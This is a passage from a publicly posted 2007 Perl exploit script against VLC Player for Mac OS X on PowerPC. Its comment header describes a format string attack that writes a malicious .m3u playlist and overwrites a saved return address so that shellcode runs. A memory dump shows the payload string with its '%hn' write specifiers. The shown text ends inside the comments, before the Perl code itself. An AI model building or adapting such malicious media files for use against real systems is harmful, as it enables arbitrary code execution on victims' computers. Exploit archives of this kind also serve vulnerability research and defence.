VLCMediaSlayer-ppc.pl.txt
Posted on 04 January 2007
#!/usr/bin/perl # # http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl # Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com # # This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address. # This code currently overwrites the saved return addy with the stack location of our shellcode. # # This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code. # # 0xf02031d2: "--? 0j? 0h%11$hn.%12$hn", 'X' <repeats 177 times>... # 0xf020329a: 'X' <repeats 200 times>... # 0xf0203362: 'X' <repeats 200 times>... # 0xf020342a: 'X' <repeats 200 times>... # 0xf02034f2: 'X' <repeats 194 times>, "ZY" # 0xf02035b7: "" # 0xf02035b8: 'X' <repeats 16 times>, "? 5? 05 17G?? 60" # 0xf02035d5: "" # 0xf02035d6: "" # 0xf02035d7: "